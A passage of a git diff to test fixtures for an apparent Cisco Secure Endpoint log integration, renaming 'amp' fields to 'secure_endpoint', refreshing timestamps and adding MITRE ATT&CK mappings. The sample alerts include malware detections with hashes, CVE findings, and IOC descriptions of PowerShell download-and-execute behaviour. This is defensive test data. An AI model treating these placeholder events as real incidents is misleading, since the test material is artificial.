command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-12T10:24:47.000Z",
@@ -2921,7 +2921,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2982,13 +2982,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:06:29.783797267Z",
+                "ingested": "2021-09-27T00:40:55.631430591Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6532910514396201000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3069,7 +3069,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783799355Z",
+                "ingested": "2021-09-27T00:40:55.631432536Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3080,7 +3080,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.GenericKD:Malwaregen.21do.1201",
                     "computer": {
                         "active": true,
@@ -3146,7 +3146,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783801409Z",
+                "ingested": "2021-09-27T00:40:55.631434453Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3156,7 +3156,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3242,7 +3242,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783803490Z",
+                "ingested": "2021-09-27T00:40:55.631436373Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3253,7 +3253,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "Auto.F2863A.211556.in02",
                     "computer": {
                         "active": true,
@@ -3319,7 +3319,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783805582Z",
+                "ingested": "2021-09-27T00:40:55.631438355Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3329,7 +3329,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3397,7 +3397,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783807646Z",
+                "ingested": "2021-09-27T00:40:55.631440284Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:30:41.000Z",
@@ -3408,7 +3408,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3483,7 +3483,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783809722Z",
+                "ingested": "2021-09-27T00:40:55.631442217Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:30:41.000Z",
@@ -3494,7 +3494,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3568,7 +3568,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-13T18:06:29.783811789Z",
+                "ingested": "2021-09-27T00:40:55.631444149Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:02:27.000Z",
@@ -3579,7 +3579,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3667,7 +3667,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-13T18:06:29.783813851Z",
+                "ingested": "2021-09-27T00:40:55.631446051Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:02:26.000Z",
@@ -3678,7 +3678,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3766,7 +3766,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-13T18:06:29.783815980Z",
+                "ingested": "2021-09-27T00:40:55.631447963Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}",
                 "kind": "alert",
                 "start": "2020-12-25T04:32:53.000Z",
@@ -3777,7 +3777,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3882,13 +3882,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:06:29.783818038Z",
+                "ingested": "2021-09-27T00:40:55.631449874Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6525498672153625000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3937,13 +3937,13 @@
             "event": {
                 "severity": 0,
                 "action": "Scan Completed, No Detections",
-                "ingested": "2021-09-13T18:06:29.783820119Z",
+                "ingested": "2021-09-27T00:40:55.631451801Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}",
                 "id": "6525494703603843000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "scan": {
                         "scanned_paths": 0,
                         "malicious_detections": 0,
@@ -4000,13 +4000,13 @@
             "event": {
                 "severity": 0,
                 "action": "Scan Started",
-                "ingested": "2021-09-13T18:06:29.783822173Z",
+                "ingested": "2021-09-27T00:40:55.631453708Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}",
                 "id": "6525494527510184000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "scan": {
                         "description": "Flash Scan"
                     },
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
index 76d410f5e5b..e1b9264db84 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
@@ -18,15 +18,45 @@
                 "name": "Demo_Threat_Hunting",
                 "hostname": "Demo_Threat_Hunting"
             },
+            "threat": {
+                "technique": {
+                    "reference": [
+                        "https://attack.mitre.org/techniques/T1005",
+                        "https://attack.mitre.org/techniques/T1053",
+                        "https://attack.mitre.org/techniques/T1064"
+                    ],
+                    "name": [
+                        "Data from Local System",
+                        "Scheduled Task/Job",
+                        "Scripting"
+                    ],
+                    "id": [
+                        "T1005",
+                        "T1053",
+                        "T1064"
+                    ]
+                },
+                "tactic": {
+                    "reference": [
+                        "https://attack.mitre.org/tactics/TA0005"
+                    ],
+                    "name": [
+                        "Defense Evasion"
+                    ],
+                    "id": [
+                        "TA0005"
+                    ]
+                }
+            },
             "event": {
                 "severity": 4,
                 "action": "SecureX Threat Hunting Incident",
-                "ingested": "2021-09-13T18:06:41.546081683Z",
+                "ingested": "2021-09-27T00:41:08.619280442Z",
